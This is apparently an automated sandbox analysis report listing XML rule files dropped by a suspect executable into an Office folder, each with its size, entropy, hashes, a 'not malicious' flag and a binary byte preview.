                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:aPypikFpL5ZdUok+b4EF8m8yyc+krVHHEwmQEkXcLDvuDY4O7/dpKCd9Nos8rrI3:kiFbyTZETL+8BkwZADe87/HKvsYTWD
                                                                                                                                      MD5:4E2619EBF329E8A3B3EA57F4E38B7AFD
                                                                                                                                      SHA1:4B2A0E4AC7E9DFC5828FB88B09D6627807AC03B9
                                                                                                                                      SHA-256:D7E273BCFA16ADDD6DF1C721D47756856DBDE0E53A0E6C0B6F64E4E3E2C2ADD2
                                                                                                                                      SHA-512:9246B7C9315D4D4C99E1D1DB8C682A3EDEC26460115E75CFD95FD87E6662D0D002991D60F97A36FE9B6BCDBBB048BBB4E456B8C0B7775AEAA7B910C6EDCF3D74
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml#UK....T... 3.zB..BjJI.D..sI..v.?..'.,FG....M....BX<}....F).?.uK....Z...."..u..eL6.......j..5.*......<....*5....+=.........#p...o....#wP. v.....R$gpH...2`.@...F....1x.>t..=...T......XV.&n.&|..;.....:fz.~.....s......@$]../..W.R.=A.UM..B-0..Zx(.1$.PCo.M..]..<v..?..~,qQ..ul..a..]....0.)..7...H.2.,.7...Z5.q.O.8.v^.d.....l....*...K6Oh.?J.....^.#g+.M.._Hg...-J...<R:.N...2.@.Yb.-.......e^.S.W..F4..8.a..G.....&...N..5...RC..^>.(;,:G..n?...8. .....3.OX..}..3..J..]... ...PB.>..*5W.*.4(s:...K..Y.....d.rzaTt.L.x*;.c}..}}...(....s|."p...2......|...)..d..Q.....MC...lt..~...C2..svj..n2d.z.T`...P..\2...1e..>S.3..a2Y.,Re..p.D1;.5t..?.y/9.W.>b.4V...u...+^Cg..]t!.@9(..#.b+.U.@......@....s..dQ....C.s.0.........jx..]._P.....YV.Wu.....*H..a.K..JC.........{w.e..,X86.3....FS.e.fE..._.d..x..0.........07........p..SaHjb..k..r.9.P\u.+.Z...W.....1..W.c4....h.....!....n.-.`.oU....0...e.....'..4.m.......8b..Q;g.A..;.2j.{.;...........j.^.......;...f...VH....yyP&..Ib..v.S

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701801v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1736
                                                                                                                                      Entropy (8bit):7.88238604381634
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:tc1cloyMi8oApRJOF9NHW57YVsMfvRFPqtBYD:+uo6KOFbm6VpFPqtG
                                                                                                                                      MD5:0274F1DEF3D4EC8F3B1D1CC3BAF757AB
                                                                                                                                      SHA1:5C7A0C8F68CDC58445DAD04C3DC4E6BBF1A56CBC
                                                                                                                                      SHA-256:ADF44B535FA095FC653AA595848C3EF1DADD4DDB1C4AE826FD652CCEC3839206
                                                                                                                                      SHA-512:5800E342012E5BC45C1E0A83124631338F3CE12A15563EE290CF345C9DB3E6B142A8824EA502B7DDB41E5198B62266E58D05A64FEE9A12C1F3918AFA65672A58
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.."....o..l..Y(7U.8..U.....@.Y.^ .J.."...+...[n.!.,.m....G.c..".Y.....>.d2......%..'.5m.@..._.b0........&o...BS.0."./.......)..G.-+...d"8{...9..P0....E..f.[7....d....2.......R..m........H...V?S.s..+.[......4W .`:{..cU.%..h.T...B..M2... ..V....3........N.@......p..+.8......p.......(.U..M..'.;m.s".N.p.0.....S...4..NIn.5....3....Mu.......>h.mT..9.;Dh..T^.%.y[l...T..l..@=7....d...|F...kMB..{c...L.v..P.../.....s.n......RX,..M.[(R...Zit..B...k...i.F."W.OF+fI.0..j.*.Y...pxG..:9J.hU4N..!8\.(*B~.u..iq.+..../M-oS.=xL........q3.{...f.[.X[.PD...;...Q@.3._.".3`.9]..S.X.t........dS..>...dM.L...E..h6.fN.._|.AnM..}.v..'.@..#T09.....*D.........G.(-..'.7.&6.E....-o.:lB.@.x....r.*.%...U.)\..oT.+v..w}.....]..W..!.8.C....#.Q.?..4.-y.j..:.....\^l..i.DW..........guR.r.......P.....I......"s.3r.{.F.,GQ..f;.....nP.ib....x...;...3...l91V.,..?....l.. ..F..Q....V..~....Bm......W^T.t...q..........LGv8.L../.r..+L...y.zP./.Et..../@..r.iq.]dIf.r.V.!......./.Q..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701850v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1704
                                                                                                                                      Entropy (8bit):7.88955501737966
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:q/MtCTpfih0WRCR4msulKOFXtKRM4VRpdMPAYJD:qkgVzBsulKOQR5gAY
                                                                                                                                      MD5:A1A4522BED4A32A9550BF6186C45F43B
                                                                                                                                      SHA1:BCE36E88C768AD0DE6A36A73F9A4E716D78BC2A1
                                                                                                                                      SHA-256:17F2CEFCE7FFFA97C635AB4676938DA0092FD6F3F0CB589C5D91F7BB67A2E71C
                                                                                                                                      SHA-512:DAA674E51C53532311F5942AB695FDCC971BFAD4AE5383AF6A45A1B1E94BA1B5FD644B10A6B1F63EE1E563588EAEF991853BE06D5AA8085AE6EAB13D67FA0A71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....|a...V}A.'.,8.........W..\&J-...|....w1.W....A3..d.....B.....Cr.n6g..i..P...........8.q......U.....t...C.C.$.A?...44.....H~.......i).a......gN/;)INa.......I...0W....\sL$R.r..r~Z......#....|...0....K...gS..h../I..*......Y......T..........{.9...........:.>......'#.4/..wt.......>u.zNz.m.? ....[.>.d.....l...rBCo.K..+...?.3. 9.)Y'.7:1f........&.:....bH`.C..x.|..Iyn.fv.f..l..3.,..Fw<l......W.n\7.T61.c......w..9.c._^..........J.m...._<=)...z.....A..W..K.b.....-.....(..Q.......'......t~.......9r..>.......X.l..B.t$..s..u..0.Ca.._f^..HL.M.........)r. t....5.........^..p....Hf....C.+...7^..!....<..M.H;J%.y4........&..z..w...$.Q....LO..+.N/O..&.Bn...pI.]h8K......Nz..BLk...1.*q..\.x...7.r...8.q>@._..2T...00.h..S...M...?.r..J.u.[x.VGy5....M...%...]r...'..c...(....*....te..a.e..W....e.0....T...ogQ67.....wR.y.}..`.7<W.!nkw.L...>YG.%...w.b ...............d.g.....z!(k.cO.....9.......x.&.$._k.$.. ...F..A....................H..1&%.~.Q..k...,.7FcY...qE...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701851v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1741
                                                                                                                                      Entropy (8bit):7.894425160825399
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:f0sDI6mrWvrQM2ja4eyMlyFhzmSGHJj7l9MrN7cD:f0sDz6orQpeCFBpW92C
                                                                                                                                      MD5:C04B169C79B1FB722703FCC087093043
                                                                                                                                      SHA1:FD5909B5A5CF043367BD10021144E935499A660A
                                                                                                                                      SHA-256:62BE19C0B7FD70114E576E8EB07B632B0D35675C96CA69561F4F527D8DA8B254
                                                                                                                                      SHA-512:6E689EB37044CEF181122DF08BDE47EDCCB63B891E5F9BE4606603C22718A165CCCC6878EAC694654FFA1BD734CFC8A3A64BC3B93C744A17AB9BA520FFBB3EEF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...W.........9..'...C....+..H...|A.T@..h......?......H..y..(..|..{t...[e...M..;..F.3..=.Q.....$>..l.tIv.62..v=.+.*h5..".\V.......o...;.w...=.$b~.CT...VQ9.mmx...t.....]EN;.u..]&...f..H.c.B.g-.B3.K..j..=.I....ohex.6. o.n...8.*P.I...o&~W..M.[.Zpsb.=....g'....j8.s..1.....f.?..u...~..N.-....p".....(..y...$.......E..0E...\_.u..n$...!IC..M2.y^}..`.#........S.`y.......^..mR,*...[..tlO.."...|q....'...H.K.`..@.sjc.e......_.1D.!k..d..Y...TC..7.^rJ...3....,........Ih....<.BVe;.u..`O.....$N:gq?p.dF.|k....9]p./..`o...k...4..Fk....us........g.@..up....I../y....|./..Q.P1..&e..2$.y.C..>.!T!..9{,6.q.t.E.0.v.Y.|Q......zB...mo.W.."+..w`......N..YY>\gP..2Ta...O...i..:.b......m...LKO..(......'VnG..9....Rx...L!/$...28:-$.~.)...fu....U.p'..MZM.'$...c./..vs.=...*...U....1*v..v.p....@e.?..._..M. ..s...e..RH....3.:....b.....w..#h....Y.d...9n.....y.,...p.j..W/y.....u._|...O...D.j..5E0.M...ql..]....99.7...B...XY.:Ea.?..........N=...9..d...N...~(....7..k.g

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701900v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1703
                                                                                                                                      Entropy (8bit):7.866267136795265
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rm/RLAfioigqBa9Raqf8IBuwfGaAn7QM9JUhQn9aD:rm/RsfPygrVM7TihWy
                                                                                                                                      MD5:3361F68865D91BECCB4DD0153BE6C6D1
                                                                                                                                      SHA1:4B55B5AD3EC260494ED105A57BE7CC4737E57C62
                                                                                                                                      SHA-256:EDCBC0683F8497754B34A4000FD725668D138DA10072CE03982A45BEAC77BD96
                                                                                                                                      SHA-512:B87DD950554768AE5D93EC64B59F140DF9F6D77AC872F840A0A2B2D29E01A36AAEF2CA33F185DE11C2DD75A23113A91D9319A10D0D9AD61345562E08E578A1C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlK..e...f.%3.Q~..j...X..CK..#..-.n.YV.sr.nX.6.m..E.I........8j#..1Z..P.7|T.^.M.^a.......$B...W[~.8..%.....O...z...Jk....T.tH......E..=..u.w.(...=.;<.j...3K.|..j8..k6..{.h9O..w....l.QV.}..c.......4... G^\....Q.C.~.....|..[j..G1.r:.hmF.h.._.i.<..D/.8..:.`.H..H.....V.-...\......rV..'b+.7.<...\..C4...,Wx.......T...yVj..n..2]...j.Wx.99.....&..H.$)zA.-.v.........o....%.01(gQ.G.m.W5wTz......~.0...ek|.6.(.".._.5......;..I.,\...z..j/...8..-?k.5...*m..n'7..=..v.y.a>}..r.T..Z...D3..m;iP..t.T....1...0>V...;....:..j][..Z...k.G.).%J_..?.A(.3.vlWTv....G.(..B....p.. ........."..[..G..Mi..M.3u.c.f-..+X....n'.M.+.QQ9..QV.~.m..z0....'.FgNkG...*}upk.T.5.r+..R..DT.9.....@...E..H.1.[%.Oi.@.a+..?Z.W,;.....xC*.|.4.ma'.....7..*.._G.b*../..Vm.3..d.....+...^.....k.....@...Y.g9.,...../......^........Xor{...p.3..gp.A..@.Fk..p.@......H...|....0....u..}..Ng. &w}n+@.p.1.`Q7e1*...1.I.@...<.Q....ch.RA!..c...pl.o.:.....O.c.O.0..C.*..;.7X('j/..Hj.^.B.9....+W.0_.......\&..eo.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701901v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1740
                                                                                                                                      Entropy (8bit):7.910024455076075
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:AgYyrgv6J2HTZKrfx9wSsfwBGrGBDckOlM0kNozQXuv/UixSq1c3JEG1ZI/ET27X:AgYynGZKr/GQDIG0Eonv/U4OaJ4qD
                                                                                                                                      MD5:8CFE05B2658E931E356E259E63501E29
                                                                                                                                      SHA1:A4FF3E0846DB250868FC33D22CC3437E88BF7437
                                                                                                                                      SHA-256:F0726570C23091B70FCE744A0BACA24C88EC2E7B7945BDBFD09990129B324E07
                                                                                                                                      SHA-512:5E2729A56E0F99B0246EAE969A140ACB666924A79966CE9B61D912A83D0B33FD3F172A601A0723F49D856F50BA1C9697CAD639A569CAA9D486C44D824CBDB79A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlZ..j*YSf. ...1.....N.J.q.....sbC.=..f{y.BHUz^......."..n}."...O)T.@eP.......`.>.....G.......b.....1....M....mF..~5.zn.....E.FB`kIA...c..pn..o.....\.Ql..0<.Y#zX.....O.co....F.......p..Ye$....w.J..P.......x{.....u.3^F];......?,E..... ..(.=.g.5k....L..-...b ....M.../..v....+%| .=?6.f.C.Jh...A..v.:..#l=.d.....k).G......h.rq.... |......N.".t.K.#..I..."l.y/...J..1..6N......#..k.J...m.XZ.$.y.%.L.2..k/.u+x...[.{\v\~..m..EO.+..\.y......";........E.sp..).@...qI$.&.....S/`........J=.J0.u.w.p.?......X..4.-...h'V.}.....A.2'....\.,m.E......kQ....0.p.}h|.Z.*..y.bu..!.5....O..(..c..O..F.;ELz...?.....5. ;>a.^.!..L....g...;..8.I...p..C;.7.x...a.5.D....."....s KjI>...-u.?7[`.Q..m...VT....H4Z..\..$i..L/....?.c@.....&.fc...l...#L.. .q..W..c......A.&f@#.>....../P.+..;V.......Dk.=+H.....s...I..sj#d ;.7.....6...h...LWd.....h.._..)9_U..M..(...]3v..9....u.... ......CKt..,..l..%)....(.g/.....QY.(:.@.."....IW.Vc..~.k.C.g....._....%/....B&\'x$k...!..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701950v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1713
                                                                                                                                      Entropy (8bit):7.890749590687141
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:WhYB5Pn9vKgX9nem6lPYdZEnX2qshxh2DPomGTSDepaLDOYx8nFJMBBFJbD:hvPn9lNem6lIZEnFshfdBTux8F6BND
                                                                                                                                      MD5:B3E450203E0AE01EB3B93E3C66AFA0F5
                                                                                                                                      SHA1:0707094F23BE697462CF187075475C372ABCA4F5
                                                                                                                                      SHA-256:30462192B6CBE37D228958D17584E0540C45962C2C3399307417C8B38938FB68
                                                                                                                                      SHA-512:71FD9B09550C200ADE86883C19D1D2F92C3AFA693D8B1A5FB216415BD6F827595CB113B9D5B41823A73144DAB2AA94F819442EFDE9C06B698C622453C7E6F6AD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....b8...N .,.@....U..x...H...cWd.f..M..n..(g....jB...&.,../.l..1JS...B.R...%{..v.MQ3Lz.XexN.80H...Z..Mp,.Y.tw)le.....d6.....b..N.wGI../..VqY.Sm..t..P#g%. OpZ..I..Me...{...K....ERW..jz."q.)...6.,...Qy.B.O._...n..3...U...m... .....\5&.( ..)....x/..v..vf.2.^.X..Y....].3ikz.h..{...n.v\...P...K.,V]..`....h.......8..O.0q.>.&s.5].+..%YM....{..rr..&...bx.w.s.e&.^..adKN.o..Z)P..Rk.5..U...A....(.^yT.k...<...:.~.{...h....i..~...\K.....4T..Z".)>cj..gc......n.b...T..X....3.JH0.8.N:.j"gc...;..O.t.D.]{VzC]|..............)Z....;;}n>*..fe@.mq.n.)S#u.V9.. |.C.!.q.z.(.q...pI..4..L}..{.P...f.J{.v.L.'D9.(.^I.$.X..La}`.L.'..{..22.*..t.R.-/...<.:T....y..............t......Oa0.x......$x.D..~&........*.=.$J....j.[-.j.x.n...zkmBF..5.#.<..Z. 'c..@...1..:/.J&|f.....}.r...kcG5G.<.-...Rt....-.{wx..0..2...wR4+...".H3.{.....$jY..Q..,.N....S.D.t......5k....l.{...,/...-|....Q...@zW..Lc....P..?........2@ (9.m.....".*..T>.K..,iNjN.(...#..t.7...&E5.aI.......h.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701951v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1750
                                                                                                                                      Entropy (8bit):7.9038852558222406
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:p/w82lti+DE9h70p0F1zWbW2ar0VitoIRld2gD:pI9tidRObGr0Vb58
                                                                                                                                      MD5:E32ED696A60E02F3788D58293B870B80
                                                                                                                                      SHA1:9674CD05BE75BEA4B137762EFC579F86C2CD43C4
                                                                                                                                      SHA-256:46C12F80FF9EB979DE03791B0FB1B3DAE2BDE08D2E8531BA130BD89C7AFC7A7F
                                                                                                                                      SHA-512:8B5E618C8C88B5BCA152FBEB21A4FBC37A323555D0032B8C6E02F5247D8CDDEC4EF03092991430908E3D634D2403C92E4AC2553DAADC04948148139AFFF228F0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.k.R.....c.........!J.(......Zu.j.`.x......d.<\%z......)..:H......s,....$.....Kv...hK.Z.b.kS......#.?.....:..Q.......v.K.4=.H'.M.W.g.T..n.9.".f..o]A..kFU=sE..DGBD1.:...g..k...-1..NRJ.,..E..qT...x...B{A.~.A...5...t.F'g..0d..#.{.....m.@,...$.1Ed....e8 ..D.0.S.KZ..X....Y..m.;.*...@U....oM..PZ..r..6._.*..b.......).4q...v.T:.|.y...%.~...p......O.}......Y..x.;..&..v...!..{.I...}D.;._.1.Y+../u..$..p...N..}..6i..M`+.D#..y.`|5..@.k/.ZbN5wr.+c.K/..C../.hk#.hY_zN.!U..Q..4...O.....k.C3.Pt....F..`9..5..}...|.#.H.x.XC.C.l.~P.U.tR.........Y*":Wo../..b....O...#.D\..j.r..fY.I..[.k......../....bV...d...sZ.........m.^..IZ.D.K.&.D1.Q..z..xm...Ex(P.F........4.=...|_.w|1j.TJ..T~...]..j3;6...LbR.>9 ....g.j...............v5.6>.i'.`5.|..n.b...{...{....A.8..........a..v....U.+.Xp..W..t.b.*.........n.g.....,.{'..O....A..........3..0i..#.D.......;.9...H3..F.Qv..<./......d./H./...f.....J.@...m..u...i..$4Wm..........5.L[.nL..^...h.7..'..JA...o

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702000v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1693
                                                                                                                                      Entropy (8bit):7.882049093856624
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:zaXQW1Y91Ct8/KzBgLMHGqrdxRS0wWCJXBuM05/D:zcw7//CqwGqctJXX05r
                                                                                                                                      MD5:994B1DFEB25E6EC79A2E23B0CCEA5764
                                                                                                                                      SHA1:D9CB4FAE4D0CA06276237C8145F3489FAF5FAEE6
                                                                                                                                      SHA-256:211ACE8FD11C99460AC45DF607178259576F646B5F7BE02F7F7F265F79D3873D
                                                                                                                                      SHA-512:44CEBE5AC6080D9E68BA64842F183253C0F2C8F3EE6413076C0CF2263DB711B3DDA3A374204BB57A6464C285D620BA532D9E06E0F9E7F537174DD43616AC1FED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlI.p.....(..y.....g.!X..(H._.!..*.!E..ly%..1r.........l}.^~t1P.P.I.o....4...}.^..T...$'_.....Y..wn....XN.4.4...f..B`CxC.9...x........;.."..6e|..nZi........]5j=._V.,.O....3......Uw.G'b.{tc..t.77.6u.....4..........C....Z.k......(N..g.j"...b.C.x...z.r}..<o...$o~(....L...h.mv?..o.u.>..\.D"".....@._..&x4...d....Rh....$........hi....,.04d..>...zy+8.+.x.h.yha.......qC1._.......1TR...|._..4.B.r...C-...8.........%.HEs%.S...Q.DC].J.c....;.mk...J..wY0_..n.z.x.i..`...;.9..:..qwW..i...r..I.p`<l.......'.U<.\..&1..qBL6..}..}.?.(.......S/..C.......=..qU...jU...#.)d........;...?..b4vrq.B.q.2&..o.Y.~x..ruuq.i.a.k..~1....._..AfQ......{&....+.....).Z.#"[._.$.. .....z}.+3.nisq..6Bx..Q......h..K...G-..TC6.........A-F]...y.*2..G..< "N9...K;&.',x.V.1.L{.9he..T...b%....f..Qs.W.<..X......m$..zkH."j?d........82.......y.........`...%.2..@.0..n.)s;..P.6.I.d.r..<..r.........S.".j....QI`'......G5n..0...8..+Z.J.....4:A.I...y.ZTAq.....&...?....ARe..w.Tk.....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702001v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1730
                                                                                                                                      Entropy (8bit):7.883695407374956
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:vSiMnsfhK/6DCW289vVjEt+7fSA30UnRILtYD:vbMaq69DbEt+sUnYE
                                                                                                                                      MD5:FB4BEF70BD4BA0D5DA52D29037A84DC1
                                                                                                                                      SHA1:FE56EE073EFBBA5F1F33A9AAACF26A937A3A8633
                                                                                                                                      SHA-256:471DA336A2D3C712357D46BB6872010788813C822768A464330DF8F89C786325
                                                                                                                                      SHA-512:CCE9E0FD1593E6B81A14094F8DB5E17802993B8E630E231CEAC560F061BF13E9AB100B65F4E528873390FFCF421D049DBC2829F08674FB46AB42DD58124273A4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml;....gk.Q..UJ..+...=..M..|c^.*^GVv..@g.....l...f..g.@.V."..3.c...d.J>....LW....../R.Nq..^....f..b#SVd.:d7.1R.jC.:...a.*...E.Q.A..w.;v.8.o..d..W...............p....Z...b.[".D.L.a...,.RK.;~.a.:.3.t.N...s.].&...Oez....X...h.X......1.RF..\|.0.g..]...'.....3.....u6.zm...7.d.....@7.p......d.U.s 8A.v.3*.U.!#H.B........n..F. .=..S.\.i..>..T.&...|.p.s..q$O<..I.....Y..T.r......E..<.c........j..m...JX.x...6[G.......c....@..ZN=$...e .....&.........e&A.T*7]M.......T.wO.j9. .~..5..;."&.4.r..7.....g.].~~....Q...m..H..ozy.q........P.!.rvG?.Xk..^.....&5O(..?.lL...y.I.....0.../x.._.9M..:L....R...g.bV.lx.|.aP..p.e.6.~..0f.......n..]+....~..V...-gY..Bhw....x....p..A..p..z..ck..tP....b.E...*..L..'......*.Q...-....7...........Y.d.p(..QW....:..z..Q.G...ke.......{..+...!3cZ...........8.<.b.<.....'y..S.H./;!.....-]..q.X.\.)..g.n.".a...N..uFq.l..bd9...x2D.....Q.r<D...0px..l._x.%..r....AN\I..5..M.G.N.v)S.N+pmZ...w,.z....8z1.IH...ZwSC.q.........

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702050v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1697
                                                                                                                                      Entropy (8bit):7.8994480351960465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Lt49UNLNtCsutWAAAd8Ri29VlnEMefl3qZ+ZD:a9UNLert2AdVWfEMZZ+R
                                                                                                                                      MD5:02FC846711535283F9EA72D8E7EF1EC2
                                                                                                                                      SHA1:7F09988114E5C4564DAF46A030CF88E382CA31FA
                                                                                                                                      SHA-256:E4EBD6BCE578092C4BF4D4177B94C04384BE4432450B4443F9808A65FAA5CA8A
                                                                                                                                      SHA-512:A50C8C0438457BC12C13769A230D99385679667E0C5033B34A15B9EAF8CB28CEC05906CB0E4C23DC777C52D79D4A9F0B8EC615AE328EF14322B9AFB0EB7C4265
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml."5...<B.<........{.+..R!....Zq....V%-.T..a..b.H......]LT...&.l.3.Q....&=5{Plt.K.\Cv!tlb.N|y....6\JE.....T.:...E...2PWoooH..Zn?v.....u}&.....,...[h.. .X.<.`....U(;u\r.......Z|.]K.a.o..Y!...m..F.l.;..l.T..6E.u....^.......@.6:i..'$...3.:..>./.......]....A.JP.N...cT.4.v...HAU4}w.Q...(VC. .n.......44`.x......v.{")......\.M'.r..7.s.&.F@J...j...4......)L....d.9:.G....:.C.^.!......m|..=.w.e..j.c.8...$..+.....?_..Y.l!u.!..!P.....$g....#.E..V@.f.$.<.UO.Y....r.#..*...Fg...*.+..^......4j.}".c.N+VZs-...O..Uf..e...a../D.{..zwn.{HQ.b..t}P....o.bh..rx.Q0.j..KL...T>.m$<..ZDB.C..Y..$&..LAd...rv..&%?.z..6.......U.Q....j.'..QN.|......"..|...........POQxc..._.Z..?Z..] ..t.H<.K..{h........U(..[c.?....../(P.U7......p.S.@..)=t.>).R.7+..%.PL.....@...V3....hv...... ...rSn.T..r0../..W..64.K..v>..0^...g<....................6..,:....y...c>..^..*.$y....h..0.t..;..qq.F..Lp').J....Z..DU...'..X...>Q.V4p5........AY./....OM....-?2..|U./.G;......eq10.8....C..E_nC...o+.H1........

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702051v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1734
                                                                                                                                      Entropy (8bit):7.888174890162737
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:TS0wTdYL9AEDJ411//XTAFeqm6To2uDQxHWnwb8Gd5pD:uTo81uFDD80xHW2N5B
                                                                                                                                      MD5:0DF5670E1CEDF439AD3C31EDAE84059F
                                                                                                                                      SHA1:CE658AEA0E4ACEB3011ED3FB09C17F1EF460644E
                                                                                                                                      SHA-256:222FBF0E996F96679A84189E19FB78C18C04FAC8382D3A11B82BADEC2BA73D50
                                                                                                                                      SHA-512:2EA38EDE236049760AE001727CA4967C97A91B65218DBF7B57D5A720691A32D40096B6F47B0EA7020490AE2CBCA04F839917EA62755380D4A50181A1FBB71F4C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..v.....5.c.)c......p.Hj<(o..o..Y...W.f.W.Zsx....u.%.#R'..U*..32MZ..T.....SDzms2....B..t}......TX....A2..B.H.V..+g$.....Gpq...(I.."G.z.L.x.q...B..._Q...`{r&.tj.<....OE.h..N...&._._9.}...3..lX\p..(.'..X..A..;T.|TM.H...3.f.....E.YF3b[.:DF.q1.j5.K..n.%..6a../..L..?nAai..YpL.....`ll:l5.*+.g_W.ri.....5....t.D....S.......(.j.QY......Z.U.......DQ..>.C3.T..3W).?..".?.[..U.....%..d....+T...X......r(.p.6...>.\.....'..g..Q....dd...:..z'Z..?.,....tEk[../.>.g....$;.]....KL.G.=.......z..Fi...W.....j+......2...n.p.s8.JBA...Xi}..&..]....zf.R.r.,-..v.sp....p...^r^f_.....L.b..2Y.:..g-..._6K.4. .R.o....Ds...>...84..=...ys....9.].oFWX .t..X/0/..MT.XJ..;..G.C...5jm.J..JE..Kk~..[>.]YI............^...}h....l.:W..7.tK0e....CL.D...6.Y..PR.7...>..D...p.Y.2.2.e..k..G..k.uu.....y...]...:.eaw....'.9'fD.^.....h.......6.S...s.8..f|'.'..D..F....,...d.q|..Y.QAO.h.%..3.v....;-uw~=p....q.fe..w..o.H_d2..SM#*...&.....G..y[.Cg...;Ba.q..1...T>..i.W.....{..&

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702100v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1704
                                                                                                                                      Entropy (8bit):7.891709108882025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:UCXw2vKbFAm+RXTnhXrs6meTre6uDxpz/qv7Hajj795BnPD:UCt3FRzhwLSCf7qv7IfB
                                                                                                                                      MD5:022FEAA4E718FFCE3330A7E06937E27B
                                                                                                                                      SHA1:49A3380E0649CB17B473E7DA3D7E7206565D4021
                                                                                                                                      SHA-256:4462C3432934FAE1303C7FE9109E02CA41514EED2EDE2A123E1E765A41DE6D34
                                                                                                                                      SHA-512:49782D867269C0BA417E9496E1159742A11DA66668C358772D30FD8C67027219A02FC9246F4EDF281ECF6B2EACFCFB405733D2A27E52254BA1088BBFC2DAAFA5
                                                                                                                                      Malicious:false
